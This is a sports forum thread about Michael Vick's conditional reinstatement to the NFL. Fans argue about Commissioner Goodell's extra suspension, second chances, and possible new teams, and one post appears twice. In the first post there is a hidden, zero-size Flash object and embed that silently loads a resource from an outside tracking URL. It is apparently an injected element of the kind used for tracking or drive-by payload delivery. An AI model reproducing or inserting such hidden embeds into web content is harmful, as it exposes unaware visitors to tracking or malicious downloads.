Michael VIck has been conditionally reinstated *MERGED* (1 Viewer)

to-crying.jpg

"That's my future quarterback."

What are the haters going to say now?<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

They are gonna protest every game he plays in. I think he paid his dues and deserves a second chance.

For those among us who have been incarcerated, or have loved ones or close friends who have been, a second chance is a true blessing! After 2 years at the "Big Top" he won't be screwing up any time soon. I wish we could get him!

why suspend him 5 more weeks? Goodell is taking this job to his head. i like the idea of cleaning up the league but the guy needs to put this behind him and allowing him to practice with a team during Preseason and having to sit out even longer is pretty dumb to me. either let him play or suspend him for life

why suspend him 5 more weeks? Goodell is taking this job to his head. i like the idea of cleaning up the league but the guy needs to put this behind him and allowing him to practice with a team during Preseason and having to sit out even longer is pretty dumb to me. either let him play or suspend him for life

Fair or not, there's noway Goodell could not punish Vick for some amount of time within the premise of the NFL and keep his credibility. He's been so suspension happy with others who weren't even convicted of a crime that there is noway he could let this pass.

Vick to Miami= Wild Dog offense...

Vick, Pennington, Ronnie Brown, Ted Ginn, Ricky Williams, and Pat White.

That'd be dangerous.

Or to Da Raiders...Vick and D Mac. Al Davis would do it.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom